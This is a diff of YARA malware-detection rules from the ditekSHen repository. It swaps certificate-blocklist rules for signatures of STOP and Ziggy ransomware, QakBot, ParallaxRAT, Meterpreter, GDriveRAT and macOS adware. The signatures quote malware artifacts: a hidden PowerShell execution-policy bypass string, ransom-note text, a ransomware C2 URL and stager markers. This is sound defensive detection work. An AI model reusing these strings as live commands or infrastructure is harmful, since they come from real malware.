+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3168-L3187"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fdb28b4f8cf79d067ee8dcfc3109ceae38f7952c6fb34e61f489924d97d67151"
+		logic_hash = "a9788b2049ae7f345760a078b2932e79fe8fc0dd71e0446c213df64480c3e3d6"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		thumbprint = "2d1fd0cce4aa7e7dc6dd114a301825a7b8e887cf"
-		importance = 20
+		clamav_sig = "MALWARE.Osx.Adware.MaxOfferDeal"
+
+	strings:
+		$s1 = "clEvE15obfuscated_data" ascii
+		$s2 = "%.*s.%.*s" fullword ascii
+		$s3 = "_Tt%cSs%zu%.*s%s" fullword ascii
+		$s4 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
+		$s5 = "__ZL20tFirefoxProfilesPath" ascii
+		$s6 = "__ZL22tFirefoxSearchFileName" ascii
+		$s7 = "__ZL37tFirefoxDefaultProfileFolderExtension" ascii
+		$s8 = "__ZL21tFirefoxPrefsFileName" ascii
+		$s9 = "__GLOBAL__sub_I_Firefox.mm" ascii
+		$s10 = "add_image_hook_" ascii
+		$s11 = "/Library/Caches/com.apple.xbs/Sources/arclite/arclite-66/source/" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONFUSER" and pe.signatures [ i ] . serial == "be:b7:21:fc:b3:27:4c:98:44:79:d6:55:4e:fe:8f:49" )
+		uint16( 0 ) == 0xfacf and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C4188D6B70B4Bd3B977B19Abd04C1157 : FILE
+rule DITEKSHEN_MALWARE_Osx_Windtrail : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects WindTrail OSX trojan"
 		author = "ditekSHen"
-		id = "f5b2b4cf-39a5-59c6-860e-b738a2acfd89"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "abf7cd20-b37d-5d0a-8f3f-f4e491965713"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5871-L5882"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3189-L3206"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6ed619e18d749c2524ad3c1ddc3268f9ddf77feb3a3f2c5954ae4e7124d63c75"
+		logic_hash = "291f919cb1e8c4b33960dd3f2c842b9efec04852bd5661543e3ee60bc0fc5ba6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "90fefd18c677d6e5ac6db969a7247e3eb0b018df"
-		importance = 20
+		clamav_sig = "MALWARE.Osx.Trojan.WindTrail"
+
+	strings:
+		$s1 = "m_ComputerName_UserName" fullword ascii
+		$s2 = "m_uploadURL" fullword ascii
+		$s3 = "m_logString" fullword ascii
+		$s4 = "GenrateDeviceName" fullword ascii
+		$s5 = "open -a" fullword ascii
+		$s6 = "AESEncryptFile:toFile:usingPassphrase:error:" fullword ascii
+		$s7 = "scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:" fullword ascii
+		$s8 = "_kLSSharedFileListSessionLoginItems" fullword ascii
+		$developerid = "Developer ID Application: warren portman (95RKE2AA8F)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRESTO Co., s.r.o." and pe.signatures [ i ] . serial == "00:c4:18:8d:6b:70:b4:bd:3b:97:7b:19:ab:d0:4c:11:57" )
+		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ad255D4Ebefa751F3782587396C08629 : FILE
+rule DITEKSHEN_MALWARE_Osx_Techyutils : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TechyUtils OSX packages"
 		author = "ditekSHen"
-		id = "58e77872-5bd0-53b1-9595-c961c45e138c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "59fd4165-987f-5b68-9341-d78184b25a1c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5884-L5895"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3208-L3224"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc51de3852257b12a780f80755c7ca21f5d82542649c65072fd9427271da12ef"
+		logic_hash = "071c67cace09dd66233bd4c4dd78c32d0f39f7e38dc06ec62e09fef67762d098"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "8fa4298057066c9ef96c28b2dd065e8896327658"
-		importance = 20
+		clamav_sig = "MALWARE.Osx.Trojan.TechyUtils"
+
+	strings:
+		$s1 = "__ZL58__arclite_NSMutableDictionary__" ascii
+		$s2 = "__ZL46__arclite_NSDictionary_" ascii
+		$s3 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
+		$s4 = "/productprice.svc/GetCountryCode" ascii
+		$s5 = "@_pthread_mutex_lock" fullword ascii
+		$s6 = "_mh_execute_header" fullword ascii
+		$s7 = "/Users/prasoon/Documents/" ascii
+		$developerid = "Developer ID Application: Techyutils Software Private Limited (VS9Q8BRRRJ)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" )
+		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_084B6F19898214A02A5F32E6Ea69F0Fd : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent04 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known downloader agent downloading encoded binaries in patches from paste-like websites, most notably hastebin"
 		author = "ditekSHen"
-		id = "37149424-6ce7-56db-98c5-3895bf3f5c9b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d591c591-aecc-557e-85b4-1e2589fbfbf9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5897-L5908"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3247-L3263"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "844339ec8aaf93e279b294830a842f007d97adc4be4f6910d143ee16e5710ed5"
+		logic_hash = "73e6af7c32d38ec5d1d2bc9f2517860367b46779b53e0faff8885b655561ab01"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4b89f40ba2c83c3e65d2be59abb3385cde401581"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent04"
+
+	strings:
+		$x1 = "@@@http" ascii wide
+		$s1 = "HttpWebRequest" fullword ascii
+		$s2 = "GetResponseStream" fullword ascii
+		$s3 = "set_FileName" fullword ascii
+		$s4 = "set_UseShellExecute" fullword ascii
+		$s5 = "WebClient" fullword ascii
+		$s6 = "set_CreateNoWindow" fullword ascii
+		$s7 = "DownloadString" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TORG-ALYANS, LLC" and pe.signatures [ i ] . serial == "08:4b:6f:19:89:82:14:a0:2a:5f:32:e6:ea:69:f0:fd" )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and #x1 > 1 and 4 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_24C1Ef800F275Ab2780280C595De3464 : FILE
+rule DITEKSHEN_MALWARE_Win_Gdriverat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GDriveRAT"
 		author = "ditekSHen"
-		id = "0bd14ac3-9761-5ac4-8cdc-6212a92c5b5d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "29e46280-39d1-5d49-ab0d-0a32398b30f0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5910-L5921"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3265-L3284"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "773fdb6d15a5bd1282dd9a48601b453b62de2e9832822858ad750c6462d6e116"
+		logic_hash = "134e66d0afc90e7fbab2c9dd034f85eb504903481e12c1ab8d7bab9321da817a"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "836b81154eb924fe741f50a21db258da9b264b85"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.GDriveRAT"
+
+	strings:
+		$h1 = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart" fullword wide
+		$h2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword wide
+		$h3 = "multipart/related; boundary=\"boundary_tag\"" fullword wide
+		$h4 = "https://www.googleapis.com/drive/v3/files" fullword wide
+		$s1 = "move gdrive.exe \"C:\\Users\\" fullword wide
+		$s2 = "file_data" fullword ascii
+		$s3 = "comp_id" fullword ascii
+		$s4 = "file_name" fullword ascii
+		$s5 = "refresh_token" fullword ascii
+		$s6 = "commands" fullword ascii
+		$s7 = "execute" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $h* ) and 5 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6401831B46588B9D872B02076C3A7B00 : FILE
+rule DITEKSHEN_MALWARE_Win_STOP : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects STOP ransomware"
 		author = "ditekSHen"
-		id = "d651bbe4-7e50-51bc-8f96-a78b11846699"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e928d917-a9d9-5830-938a-59b62608e84c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5923-L5934"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3286-L3309"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9a90c9d51dd6eb37bb3b6b17c5e3e5ebb6b6922efa14e3d8d60e72bcdb7b7259"
+		logic_hash = "61f7e7c1139c56088b2f58b78ae132ffcfef0f931c15b67ea775b0d5e51d189d"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "19fc95ac815865e8b57c80ed21a22e2c0fecc1ff"
-		importance = 20
+		snort2_sid = "920113"
+		snort3_sid = "920111"
+		clamav_sig = "MALWARE.Win.Ransomware.STOP"
+
+	strings:
+		$x1 = "C:\\SystemID\\PersonalID.txt" fullword wide
+		$x2 = "/deny *S-1-1-0:(OI)(CI)(DE,DC)" wide
+		$x3 = "e:\\doc\\my work (c++)\\_git\\encryption\\" ascii wide nocase
+		$s1 = "\" --AutoStart" fullword ascii wide
+		$s2 = "--ForNetRes" fullword wide
+		$s3 = "--Admin" fullword wide
+		$s4 = "%username%" fullword wide
+		$s5 = "?pid=" fullword wide
+		$s6 = /&first=(true|false)/ fullword wide
+		$s7 = "delself.bat" ascii
+		$mutex1 = "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}" fullword ascii
+		$mutex2 = "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}" fullword ascii
+		$mutex3 = "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $mutex* ) ) or ( all of ( $x* ) ) or ( 6 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $mutex* ) ) ) or ( 9 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : FILE
+rule DITEKSHEN_MALWARE_Win_Parallaxrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ParallaxRAT"
 		author = "ditekSHen"
-		id = "f3cb7bd9-9e28-5478-b65d-60915157dd3b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e602b28f-ae5d-52af-b1c5-5c41776dd4c5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5936-L5947"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3311-L3328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2902b075f40f1413eee937c045e082a3141ec309f9d8e1dfd3a384050ea0776c"
+		logic_hash = "7fd94dee44079b595b906f1687f44b51b8cebabbeb0900563b8d4fcc0e46bdd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e33dc0787099d92a712894cfef2aaba3f0d65359"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.ParallaxRAT"
+
+	strings:
+		$s1 = "[Clipboard End]" fullword wide
+		$s2 = "[Ctrl +" fullword wide
+		$s3 = "[Alt +" fullword wide
+		$s4 = "Clipboard Start" wide
+		$s5 = "(Wscript.ScriptFullName)" wide
+		$s6 = "CSDVersion" fullword ascii
+		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword ascii
+		$x1 = { 2e 65 78 65 00 00 84 00 00 4d 5a 90 00 }
+		$x2 = "This program cannot be run in DOS mode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" )
+		(( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7Ed801843Fa001B8Add52D3A97B25931 : FILE
+rule DITEKSHEN_MALWARE_Win_Meterpreter : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "8dc9fbde-57bb-56ca-b925-902059612606"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Meterpreter payload"
+		author = "ditekSHen"
+		id = "d72fef80-d624-5e39-963a-8d7c12eb2d9c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5949-L5960"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3330-L3343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2607dde1318b9b84056fc73664e4c1f82f20c23f311216e2201c3fdee0d1b6db"
+		logic_hash = "5226cd7bb2344b822ee94d75f81a523ff701778de97a32ae52c604a4855e960c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ee1539c1455f0070d8d04820fb814f8794f84df"
-		importance = 20
+
+	strings:
+		$s1 = "PACKET TRANSMIT" fullword ascii
+		$s2 = "PACKET RECEIVE" fullword ascii
+		$s3 = "\\\\%s\\pipe\\%s" fullword ascii wide
+		$s4 = "%04x-%04x:%s" fullword wide
+		$s5 = "server.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" )
+		( uint16( 0 ) == 0x5a4d and all of them ) or ( filesize < 300KB and all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0F0Ed5318848703405D40F7C62D0F39A : FILE
+rule DITEKSHEN_MALWARE_Win_Trojan_Expresscms : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ExpressCMS"
 		author = "ditekSHen"
-		id = "6baebaa7-275c-571d-b321-9a21d7799a33"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d096db0c-05f6-5b69-9d84-0105f2182ff3"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5962-L5973"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3366-L3382"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77bd8fd2dc48e2fc8abbf0f3411dfa8010326b6a9928fb392cce6e0fe8e9d309"
+		logic_hash = "64d551e0c11b6394f9ae2b8fa749c36cb1b5c3f498592f95dc19fdea23c53160"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ed91194ee135b24d5df160965d8036587d6c8c35"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.ExpressCMS"
+
+	strings:
+		$s1 = "/click.php?cnv_id=" fullword wide
+		$s2 = "/click.php?key=" wide
+		$s3 = "jdlnb" fullword wide
+		$s4 = "Gkjfdshfkjjd: dsdjdsjdhv" fullword wide
+		$s5 = "--elevated" fullword wide
+		$s6 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%d" wide
+		$s7 = "\\Microsoft\\Manager.exe" fullword wide
+		$s8 = "\\Microsoft\\svchost.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_537Aa4F1Bae48F052C3E57C3E2E1Ee61 : FILE
+rule DITEKSHEN_MALWARE_Win_Meterpreterstager : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Meterpreter stager payload"
 		author = "ditekSHen"
-		id = "33316c5e-b14f-50b5-8971-3a8b5a3c2497"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dfbc37e9-13e0-55e2-a501-1005eea52b63"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5975-L5986"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3384-L3395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83d205998f43a2404146064e13726c149bc56fed6b886ee1812378c027f03da0"
+		logic_hash = "0ac53a10abb1e4dd7da57872cd1779851d953127a912c31a5e411d8eb9bd07f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "15355505a242c44d6c36abab6267cc99219a931c"
-		importance = 20
+
+	strings:
+		$s1 = "PAYLOAD:" fullword ascii
+		$s2 = "AQAPRQVH1" fullword ascii
+		$s3 = "ws2_32" fullword ascii
+		$s4 = "KERNEL32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALPHA AME LIMITED LLP" and pe.signatures [ i ] . serial == "53:7a:a4:f1:ba:e4:8f:05:2c:3e:57:c3:e2:e1:ee:61" )
+		uint16( 0 ) == 0x5a4d and all of them and filesize < 100KB
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_61B11Ef9726Ab2E78132E01Bd791B336 : FILE
+rule DITEKSHEN_MALWARE_Win_Ziggy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Ziggy ransomware"
 		author = "ditekSHen"
-		id = "5b830ab1-16d2-573c-81b7-b8b922af6f4b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6d2d316a-cf19-5001-bf94-842346229d76"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5988-L5999"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3397-L3421"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "50c89d732409ff680734f481d858256001245c10345d9e6f1cbb51dcdc9c2cc9"
+		logic_hash = "103a50511971161ca673e0c8378aeca2fa7d0f6309966bbb2b70e0d039e0f196"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9f7fcfd7e70dd7cd723ac20e5e7cb7aad1ba976b"
-		importance = 20
+		snort2_sid = "920098"
+		snort3_sid = "920096"
+		clamav_sig = "MALWARE.Win.Ransomware.Ziggy"
+
+	strings:
+		$id1 = "/Ziggy Info;component/mainwindow.xaml" fullword wide
+		$id2 = "AZiggy Info, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
+		$id3 = "Ziggy Ransomware" fullword wide
+		$id4 = "clr-namespace:Zeggy" fullword ascii
+		$s1 = "GetCooldown" fullword ascii
+		$s2 = "checkCommandMappings" fullword ascii
+		$s3 = "add_OnExecuteCommand" fullword ascii
+		$s4 = "MindLated.jpg" fullword wide
+		$s5 = "http://fixfiles.xyz/ziggy/api/info.php?id=" fullword wide
+		$s6 = "Reamaining time:" fullword wide
+		$msg1 = "<:In case of no answer in 12 hours write us to this e-mail" ascii
+		$msg2 = "Free decryption as guarantee" fullword ascii
+		$msg3 = "# Do not try to decrypt your data using third party software, it may cause permanent data loss" ascii
+		$msg4 = "# Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can becom" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $id* ) or 4 of ( $s* ) or 3 of ( $msg* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E339C8069126Aa6313484Fea85B4B326F7B8860C : FILE
+rule DITEKSHEN_MALWARE_Win_Nworm : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NWorm/N-W0rm payload"
 		author = "ditekSHen"
-		id = "a8a6a285-98e1-5a2a-ab89-c67809fea3b2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "06546ccf-8914-5b1c-942f-99664b9ecf44"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6001-L6012"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3423-L3443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6f373c5a8f99893088fa1afffeccdf24ae6ed118d7bea9df43281073bd8e85bb"
+		logic_hash = "a1397a057422be260b5bdf1eb58571e95c259c132cc2518b39e1524a0eda9c66"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e339c8069126aa6313484fea85b4b326f7b8860c"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.NWorm"
+
+	strings:
+		$id1 = "N-W0rm" ascii
+		$id2 = "N_W0rm" ascii
+		$x1 = "pongPing" fullword wide
+		$x2 = "|NW|" fullword wide
+		$s1 = "runFile" fullword wide
+		$s2 = "runUrl" fullword wide
+		$s3 = "killer" fullword wide
+		$s4 = "powershell" fullword wide
+		$s5 = "wscript.exe" fullword wide
+		$s6 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" fullword wide
+		$s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
+		$s8 = "Start-Sleep -Seconds 1.5; Remove-Item -Path '" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Germany classer software" and pe.signatures [ i ] . serial == "01" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $id* ) and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of ( $x* ) and 2 of ( $s* ) ) or 7 of ( $s* ) or 10 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_734D0Baf7A6B44743Ff852C8Ba7A751A7Ff0Ec73 : FILE
+rule DITEKSHEN_MALWARE_Win_Qakbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects variants of QakBot payload"
 		author = "ditekSHen"
-		id = "1dc06f6e-2152-516a-b9cc-0d95c098c88f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3a3b3b6c-0969-584e-a184-7acfca3cdd42"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6031-L6042"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3445-L3457"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "54620c58bae2c2f9859916a58b0fef4310dd27fdada663c28bb7d58bdaefc7c5"
+		logic_hash = "b64c05eb7ac03b2b4709f9979d117e4cacc617f21d0b3bf1c1be42aa18cc44cc"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "734d0baf7a6b44743ff852c8ba7a751a7ff0ec73"
-		importance = 20
+
+	strings:
+		$s1 = "stager_1.dll" fullword ascii
+		$s2 = "_vsnwprintf" fullword ascii
+		$s3 = "DllRegisterServer" fullword ascii
+		$s4 = "Win32_PnPEntity" fullword wide
+		$s5 = "0>user32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Transition software (C) 2018" and pe.signatures [ i ] . serial == "01" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
